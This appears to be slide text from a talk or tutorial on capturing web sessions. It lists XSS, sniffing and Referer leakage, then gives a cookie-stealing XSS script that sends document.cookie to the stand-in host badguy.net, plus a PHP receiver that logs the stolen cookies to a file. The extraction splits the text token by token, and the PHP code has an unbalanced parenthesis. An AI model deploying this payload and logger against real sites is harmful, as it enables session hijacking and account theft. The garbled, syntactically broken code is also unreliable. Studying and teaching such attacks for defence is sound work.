Sessions :: Capture
Sessions :: Capture
XSS
Sniffing - tcpdump ethereal etc.
Leakage REFERRER Header - URL Based (remote avatar icons)
<script>
var
x =
new
Image
(
)
; x.src =
'http://badguy.net/x.php?steal='
+ document.cookie;
</script>
$
fp
=
fopen
(
'stolen_cookies.log'
,
'a'
)
)
;
fwrite
(
$
fp
,
$
_SERVER
[
"REQUEST_URI"
]
)
;
fclose
(
$
fp
)
;